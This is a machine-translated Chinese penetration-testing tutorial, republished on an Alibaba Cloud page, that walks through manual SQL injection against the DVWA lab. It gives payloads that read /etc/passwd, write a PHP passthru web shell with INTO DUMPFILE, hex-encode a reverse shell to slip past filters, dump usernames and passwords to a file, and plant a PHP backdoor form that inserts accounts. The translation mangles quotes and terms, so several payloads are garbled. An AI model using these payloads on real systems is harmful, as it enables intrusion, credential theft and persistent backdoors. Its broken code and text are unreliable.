Small white diary 40:kali Penetration Testing Web infiltration-sql Manual Injection (ii)-read files, write files, bounce shell

Source: Internet
Author: User

SQL Manual Injection

1. Read the file "Load_file function"

' Union SELECT NULL,load_file('/etc/passwd ')--+


2. Writing Files

' Union select NULL,' <?php passthru ($_get[' cmd ');?> " into DumpFile"/var/www/a.php "--+" write a trojan; into D Umpling:mysql function, the input is downloaded in the database "

# # #此语句往往会提示无法写入, because of a lack of permissions "to run MySQL's account to gain access to your own body"

' Union select NULL, ' <?php passthru ($_get[' cmd ');?> "into DumpFile ' a.php '--+ ' writes it to the default path (using single quotation marks):/var/lib/mysq L/dvwa/a.php (Dvwa's account) "

You can use a file inclusion vulnerability when writing to a file #当无权限进行 the specified directory

First, write to the Universal directory/tmp/, and then combine the file Containment vulnerability

' Union select NULL, ' <?php passthru ($_get[' cmd ');?> "into DumpFile"/tmp/a.php "--+


Note: the "<", "?", "PHP", ">" characters may trigger the filtering mechanism when the Web Trojan is injected via a URL, so you should use the encoding bypass

# # #将网页木马编译成binaries , the database converts it to PHP code storage using into dumpling

Copy Bounce Shell

Modify Bounce Shellip


Cat b.php | Xxd-ps "Xxd:linux integration, 16 Binary Editor viewer;-ps: Show encoded Content"

#16进制存在换行符, we need to tidy up and add a layer of piping.

Cat b.php | Xxd-ps | Tr-d ' \ n ' "tr-d: Delete"

Then replace the encoded ciphertext with the plaintext

(0x ciphertext)

3. Save the Download number "Drag library"

' Union select NULL, CONCAT (User,0x3a,password) from the users into OUTFILE '/tmp/a.db '--+

#若没有文件包含之类的漏洞可以下载拖库文件, by limiting the number of queries, step-by-step replication of the paste for data theft

when uploading Webshell cannot achieve the purpose of the operation, can write server-side code, for their own use

#对目标有足够了解, database structure, table structure, programming logic method

Create a form, insert an account into the user's account database "because it is difficult to decipher the encrypted content of the database", the equivalent of developing a function

' Union select NULL, ' <?php if (isset ($_post["Submit")) {$userID = $_post["UserID"]; $first _name
= $_post["First_Name"]; $last _name = $_post["last_name"]; $username =
$_post["username"]; $avatar = $_post["Avatar"]; echo "UserID: $userID <BR>"; Echo
"First_Name: $first _name<br>"; echo "last_name: $last _name<br>"; echo "Username:
$username <BR> "; echo "Avatar:$avatar<BR> ";
$con =mysqli_connect ("", "Root", "" "," Dvwa "); if (Mysqli_connect_errno ()) {echo
"Failed to connect to MySQL:". Mysqli_connect_error (); } else {echo "Connected to
Database<br> "; }$password = "123"; $sql = "INSERT into dvwa.users values (\ \" $userID \ \ ", \
\ "$first _name\\", \ \ "$last _name\\", \ \ "$username \", MD5 (\ \ "$password \"), \ \ "$avatar \
\")"; if (Mysqli_query ($con, $sql)) {echo "[successful insertion]: $sql";} else {echo "Error
Creating database: ". Mysqli_error ($con); } mysqli_close ($con); }?> <form method= "POST"
action= "<?php echo $_server[" php_self "]?>" > <input type= "text" Name= "UserID"
Value= "><br> <input type=" text "name=" first_name "value=" FH "><br> <input type=" text "
Name= "last_name" value= "y" ><br> <input type= "text" name= "username" value= "YFH" ><br>
<input type= "text" name= "Avatar" value= "yfh!" ><br> <input type= "Submit" name= "Submit"
Value= "Submit Form" ><br> </form> ' into DumpFile '/tmp/user.php '--

Small white diary 40:kali Penetration Testing Web infiltration-sql Manual Injection (ii)-read files, write files, bounce shell

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.